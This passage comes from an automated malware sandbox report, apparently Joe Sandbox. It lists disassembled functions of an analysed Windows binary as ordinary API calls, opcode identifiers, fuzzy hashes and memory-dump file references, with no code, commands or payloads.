                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC313C20A0864346FB14BF64AC55FBEE2B1EF51784FC554B4D90E472D7DE2CA9078A70
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                            • Opcode ID: 4ba61a3cc0556e7c92b6fc1e72a638e9c9ea62dc27ce852986ab15971a897a88
                                                                                                                                                                                                                                                            • Instruction ID: b6aefcbd7029057e194b88ec9bc1339a9321e29fc5a1f2c90121c49026c9f6d4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ba61a3cc0556e7c92b6fc1e72a638e9c9ea62dc27ce852986ab15971a897a88
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31D06764B08A438AFB583F705C99C799275DF48741F9114BCD81B16393CE2CA98A4B60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectoryMessage
                                                                                                                                                                                                                                                            • String ID: Security descriptor is not initialized!
                                                                                                                                                                                                                                                            • API String ID: 73271072-986317556
                                                                                                                                                                                                                                                            • Opcode ID: c8cf0510d3cf58293c8056e04266fc05212419b77e6f78cec61fc6e6c2a7edb1
                                                                                                                                                                                                                                                            • Instruction ID: 0d688ca75ee5c2ca90d35d723b441ad191df0ac67d955cc74444ff23b1e032ec
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8cf0510d3cf58293c8056e04266fc05212419b77e6f78cec61fc6e6c2a7edb1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EE06DB1A18B4786FB20AB24EC45A6AA2A0FF95354FC01374E14C463E4EF3CD25A8F00
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: b54b3d0524db6e35a6be9399f4168b0f839baac618e96e940c4dc5df63f75cb8
                                                                                                                                                                                                                                                            • Instruction ID: 88119b4f911cb014e6cd16844b6e35f4a89e722504cd7b308b89c9b77a1c0441
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b54b3d0524db6e35a6be9399f4168b0f839baac618e96e940c4dc5df63f75cb8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2351D561B092428EFB28BA259C01E7AF6A1FF44BA4F944774DDAD077C5CE3CD4428E61
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF72AA8B579,?,?,00000000,00007FF72AA8B62E), ref: 00007FF72AA8B76A
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF72AA8B579,?,?,00000000,00007FF72AA8B62E), ref: 00007FF72AA8B774
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1687624791-0
                                                                                                                                                                                                                                                            • Opcode ID: e3b73f063bb60367d817196ec2a4f8f6eb52bee7e7896c4ceb0739ce7562b917
                                                                                                                                                                                                                                                            • Instruction ID: 919efa64e07045059cc3686da9079a3890a51d931daae649b96580ba2c87203c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3b73f063bb60367d817196ec2a4f8f6eb52bee7e7896c4ceb0739ce7562b917
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4021DB61F0A78249FF5177209C84A7D92A2EF447E0F8446B5DB6D473D5CE6CE4464B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                                            • Opcode ID: 62a26f8d1512d31d847f2a475d98554d5a752059faf1bb854899a2cf804e20f8
                                                                                                                                                                                                                                                            • Instruction ID: 4cdaa11f720ae9bea211439b4150fc4369715627bac5457541e663f8b415cd01
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62a26f8d1512d31d847f2a475d98554d5a752059faf1bb854899a2cf804e20f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02119061A08A8289EB10AB25AC44569E771EF84BF4F944372EA7D077D9DE3CD0528B40
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA85EF1), ref: 00007FF72AA8600F
                                                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA85EF1), ref: 00007FF72AA86025
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                                                            • Opcode ID: 32438027c896fc9b7cfa90544aa36bc1c4b0d83a992ad2bd2587f4ad36304ad4
                                                                                                                                                                                                                                                            • Instruction ID: 58b706508d0ddb1c0efd1bdea2c588a942b40ce4ddab1fbe506d1fe569eb3748
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32438027c896fc9b7cfa90544aa36bc1c4b0d83a992ad2bd2587f4ad36304ad4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E118F7260C60286FB94AB55A80183EF7B0EF84761F904279F69E819D8EF2CD005CF10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA88519), ref: 00007FF72AA886BF
                                                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA88519), ref: 00007FF72AA886D5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                                                            • Opcode ID: c01ff3a2a11960581671d504f9b8c47b5ef938e1e8c71af115ecd984c59071e9
                                                                                                                                                                                                                                                            • Instruction ID: 49c28024d228f8f618361da164bf654bb7902b9519a0e6ded4483b1f874dea1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c01ff3a2a11960581671d504f9b8c47b5ef938e1e8c71af115ecd984c59071e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6017C2250C692C6F754AB14A801A3EF3B1FF857A1FA00276E6A9019D8EF3CD002CF20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF72AA93972,?,?,?,00007FF72AA939AF,?,?,00000000,00007FF72AA93E75,?,?,00000000,00007FF72AA93DA7), ref: 00007FF72AA8B502
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF72AA93972,?,?,?,00007FF72AA939AF,?,?,00000000,00007FF72AA93E75,?,?,00000000,00007FF72AA93DA7), ref: 00007FF72AA8B50C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 588628887-0
                                                                                                                                                                                                                                                            • Opcode ID: c6b9e98d984d24e8bfd8e8ff83776c8447130b112ec08e9122362d67c2677dc5
                                                                                                                                                                                                                                                            • Instruction ID: 7fb050b589434ca671ef04ea197496c47afe35ac59e6c7500756b8313b7eb0e8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6b9e98d984d24e8bfd8e8ff83776c8447130b112ec08e9122362d67c2677dc5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60E08650F0A6038AFF187BB15C45C79D571DF98B00FC444B4DD0E46251EE2C69474E30
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                                                                                                                            • Opcode ID: 25cba87855c0571564d380caaddad194b65a7b1ee83bb0c7e49656b6643110b8
                                                                                                                                                                                                                                                            • Instruction ID: 138a907d94366ff6315cd835b45be5bc55cacc9c1a2da670379e2b217ba43fb5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25cba87855c0571564d380caaddad194b65a7b1ee83bb0c7e49656b6643110b8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31D0C914E5D9038AF7543BB15C89D3991B0DF58B61FD006B0C41A801D1DE1CA1870A21
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2018770650-0
                                                                                                                                                                                                                                                            • Opcode ID: 94f9cb437eb1ff87f9bc785627a082ceb46c643cc627e045b1becda1a3c124ee
                                                                                                                                                                                                                                                            • Instruction ID: 7ff5c43fe99b5bb18ca8585afc5e23cbca4ae27b17a2a7557eaa5ff7890dbedf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94f9cb437eb1ff87f9bc785627a082ceb46c643cc627e045b1becda1a3c124ee
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01D0C950E1A903CAF7583BB61C8983891B0EF88761FD006B0C41A811D4DE2CA2470E21
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF72AA72A9B), ref: 00007FF72AA78C0A
                                                                                                                                                                                                                                                            • _findclose.LIBCMT ref: 00007FF72AA77F99
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2772937645-0
                                                                                                                                                                                                                                                            • Opcode ID: 48f146a0b58ba69d35d10fb74dcf7020fe44260969c36ff7d18f8529940cc898
                                                                                                                                                                                                                                                            • Instruction ID: 4ca3505b2c83edd10d598361426667361e58f755cd6266ef50fe645b822590f1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48f146a0b58ba69d35d10fb74dcf7020fe44260969c36ff7d18f8529940cc898
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF717152E18AC581E711DB2CD9452FDA370FBA9B4CF94E321DB9C12552EF28E2D5CB10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 9bd69e230f0d3b0e5758ab1338c67e81032152045ba6d69f05b41d5745cc01d1
                                                                                                                                                                                                                                                            • Instruction ID: 3319a0b940b15b2434510aff1330be5c743b9f779685592e679341703af6907f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bd69e230f0d3b0e5758ab1338c67e81032152045ba6d69f05b41d5745cc01d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E441913290A6428BFB24EE19E941A79F7B1EF56B91F940171D68E426D1CF2CE443CE60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                                                            • Opcode ID: 4ac7791aa6530d53889ae2cf6e96e06d6373f6c7274d4006fa6c7a0f2d2963ab
                                                                                                                                                                                                                                                            • Instruction ID: b9357857b2eafbc9a8360a34b5baeb1b5c30ea287ec7a9e8a49acca020236de2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ac7791aa6530d53889ae2cf6e96e06d6373f6c7274d4006fa6c7a0f2d2963ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26218022B0825246FB54BA166D04BBFE661FF49BD4FC85470EE4D07786CE3DE0838A24
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
